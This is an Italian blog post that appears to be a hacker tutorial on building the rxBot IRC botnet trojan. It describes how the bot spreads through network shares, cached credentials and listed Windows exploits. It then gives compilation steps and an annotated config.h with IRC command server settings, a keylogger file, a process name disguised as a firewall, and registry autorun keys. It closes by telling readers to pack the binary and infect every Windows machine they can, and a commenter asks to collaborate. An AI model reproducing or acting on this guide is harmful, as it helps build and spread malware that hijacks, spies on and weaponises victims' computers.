RXBOT (botnet)

————————————————————————————————————————–
BENVENUTI IN QUESTA ULTIMA MIA GUIDA DOVE VI SPIEGHERO’ … NEI PASSI PIU SEMPLICI POSSIBILI
COSA SIA UN RBOT, E QUALI CARATTERISTICHE LO COMBINANO…ANCHE PERCHE’ QUESTO FENOMENO SI STA
ESPANDENDO SEMPRE DI PIU ED E’ FRUTTO DI POTENTI ATTACCHI DENIAL OF SERVICE GRAZIE A VARIE
MACCHINE LINKATE TRA LORO…QUESTO MI FA RICORDARE MOLTO I CLIENT PER DDOS PER LINUX..
TIPO IL TRIBE FLOOD =) BUCAVI IL SERVER , TI LOGGAVI DENTRO , MONTAVI ROOTKIT , APRIVI PORTA
E LINKAVI COME MASTER AL CLIENT E QUESTO VIA DICENDO CON CENTINAIA DI UNIX ANCHE DETTE SHELL
MA QUESTA E’ UN ALTRA STORIA… ADESSO DOBBIAMO TRATTARE DI RBOT E NON DI CLIENT PER LINUX

{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}

APPROFONDIMENTI SULL’RB0T

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

COSA E’ UN RXB0T??? Sinceramente il vero nome attribuito a questo programma e’ rb0t perche’ oltre all’rx
ce ne sono altri tipo come URX,CRX,VRX,RX ecc ecc… Ogniuno con tale scopo.. Chi scanna,chi sniffa,chi dossa
ecc ecc!Questo trojan ha facile propagazione in tutta la rete locale.. e puo’ infettare qualsiasi piattaforma
windows dalla 95 alla XP… Per vista nn so se sia attaccabile e’ tutto da controllare..i suoi effetti sono
Duplicarsi all’infinito,modificare il registro di sistema, sfruttare molte vulnerabilita’ del sistema operativo
Sottrarre informazioni e avere pieno accesso del computer tramite una console guidata da IRC dall’attacker…
Fa una copia di se stesso utilizzando un nome file dalla lista a %­SYSDIR% Utilizzando uno dei seguenti nomi:
• logon.exe
• firewall.exe
• algs.exe
• explorer.exe
• Isass.exe
• iexplore.exe
• spoolsvc.exe
• winamp.exe
• csrs.exe
e subito dopo Cancella la copia di se stesso eseguita inizialmente.
Per assicurarsi la propria propagazione, il malware tenta di connettersi ad altre macchine come descritto qui sotto:
Fa più copie di se stesso nelle seguenti condivisioni di rete:
• c$windows
• c$winnt
• d$shared
• e$shared
• print$
• IPC$
• admin$
• admin$system32
Utilizza le seguenti informazioni di login per aprirsi l’accesso alla macchina remota,
Nomi Utente e Password presenti nella cache.
Ma quali exploit sfrutta questo trojan????? eccovi la lista =)

Sfrutta la seguente vulnerabilità:

– MS03-007 (Unchecked Buffer in Windows Component)
– MS03-026 (Buffer Overrun in RPC Interface)
– MS04-007 (ASN.1 Vulnerability)
– MS04-011 (LSASS Vulnerability)
– MS05-039 (Vulnerability in Plug and Play)

In piu’ Crea degli indirizzi IP casuali mentre mantiene i primi due ottetti dal proprio indirizzo. In seguito prova a stabilire
una connessione con gli indirizzi creati.

*Linguaggio di programmazione:
Il malware è stato scritto in MS Visual C++.
Per complicarne l’individuazione e ridurre la dimensione del file, viene compresso con il seguente software di compressione:
• AS Protect 1.2

{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}

ViSUAL C++

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

Il visual c++ e’ un programma per scrivere programmi in c… questo molto utilizzato su piattaforme windows…
Questo e’ il programma ke andremo ad utilizzare per compilare il nostro src dell’rb0t.. reperibile da qualsiasi
programma P2P come ad ad esempio TORRENT oppure il nostro amato EMULE… basta scrivere
Visual C+ 6.0 ENTERPRISE sono circa 600mb a CD ne dovrebbero essere un paio 6 credo… ma nn ne sono sicuro =)

{°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*}

COMPILAZIONE

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

Finalmente direte voi! dopo tanto rompimento di balle sulla spiegazione di questo virus siamo riusciti
finalmente ad arrivare alla compilazione! Quello che a tutti noi interessa… bene allora senza
altri intralci iniziamo subito! ^^

Allora scarichiamo o procuriamoci questi programmi…

-Visual C++ ENTERPRISE ( programma fondamentale per la compilazione dell rbot )
-Librerie SDK ( librerie fondamentali per la compilazione )
-Service pack 6 ( aggiornamento al visual c++ .. per intenderci piu aggiornato e’ meglio e’! )
-Src Rb0t ( Un source qualsiasi di un rxb0t ,

LINK UTILI…

Service pack 6.0 ( http://www.microsoft.com/downloads/details.aspx?familyid=A8494EDB-2E89-4676-A16A-5C5477CB9713&displaylang=it )

/ATTENZIONE/:

Ci sono rxbot nn cripatati e quindi ke devono essere compilati normalmente a caratteri normali
invece ci sono alcuni che vengono compialti criptati… ma questo credo che ne riparleremo
nella prossima Guida….

Allora per prima cosa dopo aver installato tutto! Mettete tutti i src dell’rx bot in una cartella
che poi tratteremo…
Aprite il Visual e andate nel pannello delle impostazioni ovvero ” OPTIONS ”
Dirigiamoci su “DIRECTORIES ” e selezioniamo EXECUTABLE FILES dove andremo ad inserire la
prima libreria dell SDK ovvero la BIN!
Cliccate 2 volte in basso alla finestrella dove appaiono le due “..” e diciamogli di
indirizzarci sulla PATH O meglio DIRECTORY dove e’ situato la libreria dell SDK ovvero
C:PROGRAM FILESMICROSOFT SDKBIN
fatto cio… facciamo lo stesso con le seguenti voci…
-Executable files ( C:PROGRAM FILESMICROSOFT SDKBIN )
-Include files ( C:PROGRAM FILESMICROSOFT SDKINCLUDE )
-Library files ( C:PROGRAM FILESMICROSOFT SDKLIB )

Una volta fatto andiamo nella cartella dove abbiamo il sorgente dell rx e apriamo il file .dsw
e ora dobbiamo cercare il file config.h dove setteremo tutte le nostre impostazioni su dove
mettersi in ascolto il nostro trojan , su quale canale joinare e tutte le altre cose…
Quindi… si passa al prossimo capitolo!
ANALISI Config.h

{,.+*°*+.,,.+*°*+.,,.+*°*+.,,.+*°*+.,}

PRENDO IN ESEMPIO UN RX MOLTO VALIDO E BUONO LA CARA E VEKKIA MOD DI “DoS Resilient RPMiSO”
OK il config si presenta cosi

// Good shit Mod By DoS Resilient RPMiSO !
// bot configuration (generic) – doesn’t need to be encrypted
int port = 6667;                                // “Questa e’ la porta del server IRC”
int port2 = 7000;                                // ” In caso la porta fosse chiusa usa un’altra”
int socks4port = 1980;                        // Port # Questo da utilizzare se usiamo Sock
int tftpport = 69;                                // Port # questa e’ la porta del demone ftp
int httpport = 84;                        // Port # questa e’ la porta del demone http
int rloginport = 5004;                        // Port # questa e’ la porta del demone rlogin
BOOL topiccmd = TRUE;                        // Qua settiamo se il bot deve autosettare il topic
BOOL rndfilename = FALSE;                // Comando per mettere un nick random al bot
BOOL AutoStart = TRUE;                        // Abilita l’autostart del registro
char prefix = ‘-‘;                                // il comando che verra’ dato al bot sara’ -comando
int maxrand = 6;                                // Numeri random ke verranno dati al bot preceduto dal nick
int nicktype = COUNTRYNICK;                // nick type
BOOL nickprefix = TRUE;                        // nick uptime & mirc prefix

#ifdef DEBUG_LOGGING
char logfile[]=”c:\r0fl.txt”;
#endif

#ifndef NO_CRYPT // Only use encrypted strings or your binary will not be secure!!

#else  // Recommended to use this only for Crypt() setup, this is unsecure.

char botid[] = “BoT”;                                                // Qua verra’ messo l’id del bot
char version[] = “[rxBot ItalianMod by DoS|ResilienT|RPMISO”;                // Il nome della Mod =) non modificare =)
char password[] = “Tuapass”;                                        // la password ke verra’ loggata dal bot
char server[] = “irc.flashirc.org”;                // qua mettiamo il nostro server irc dove joinera’ il bot
char serverpass[] = “”;                                                // se il server ha una password settiamola
char channel[] = “#Tuocanale”;                                // Qua inseriamo il canale dove joinera’ il bot
char chanpass[] = “tuakey”;                                        // qui metteremo la password o meglio +K se il chan a password
char server2[] = “irc2.flashirc.org”;                                // in caso di down server settiamo un altro irc server (optional)
char channel2[] = “#tuocanale”;                                                // in caso il chan fosse non disponibile (optional)
char chanpass2[] = “tuakey”;                                                // password dell’altro chan =) settato da noi (optional)
char filename[] = “Sygate.exe”;                        // nome che daremo al processo che si vedra’ nella TASK MANAGER
char keylogfile[] = “Allarm.txt”;                                // fILE name del Keylogger
char valuename[] = “Sygate Personal Firewall”;                // value name per l’autostart ( dal registro di sistema )
char nickconst[] = “”;                                        // first part to the bot’s nick
char szLocalPayloadFile[]=”msconfig.dat”;        // Payload filename
char modeonconn[] = “+n+B”;                                        // Can be more than one mode and contain both + and –
char exploitchan[] = “#tuocanale”;                                        // mettiamo il nostro chan per visualizzar l’exploitazione
char keylogchan[] = “#tuocanale”;                                                // mettiamo il nostro chan per visualizzar il keyloger
char psniffchan[] = “#tuocanale”;                                                // mettiamo il nostro chan per visualizzar lo sniffing =)

char *authost[] = {
“*@*”, <—– SETTIAMO QUI *@* cosi qualunque HOST potra loggarsi in caso avete un bnc mettete *HOSTBNC* =)
};

char *versionlist[] = {
“”
};

char regkey1[]=”Software\Microsoft\Windows\CurrentVersion\Run”; —> path dove si andra’ ad inserire il bot
char regkey2[]=”Software\Microsoft\Windows\CurrentVersion\RunServices”; –> path dove si andra’ ad inserire il bot
char regkey3[]=”Software\Microsoft\OLE”; –> path dove si andra’ ad inserire il bot
char regkey4[]=”SYSTEM\CurrentControlSet\Control\Lsa”; –> path dove si andra’ ad inserire il bot

#endif

#ifdef PLAIN_CRYPT
char key[16] = “i0r0xx0″; // CHANGE THIS!!! hmmm..Do I even need this now?
#endif

BENE UNA VOLTA COMPILATO COME SEGUE QUESTO FILE CLICCATE IN ALTO SU BUILD E SUBITO DOPO rbot.exe E VI CREERA’ UN
FILE rb0t.exe NELLA CARTELLA SPECIALE DELL’RX… DOPODICHE LA PACKERETE CON UN QUALSIASI PACKER ” DECENTE ”
E SARETE PRONTI AD INFETTARE TUTTE LE MACCHINE POSSIBILE INIMAGINABILI PER WINDOWS….

TUTTO IL MATERIALE LO TROVATE ——–>QUA’

ECCO IL VIDEO…

Una Risposta to “RXBOT (botnet)”

  1. Shellmin32 Says:

    Salve amico desidero mettermi in collabborazione con te… possiamo andare avanti.. mi capisci?? server.register@gmail.com se desideri rispondermi..
    o vieni in irc.. ci sono sempre 24 su 24 server: irc.mrchat.org😉
    Piacere Emanuele

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: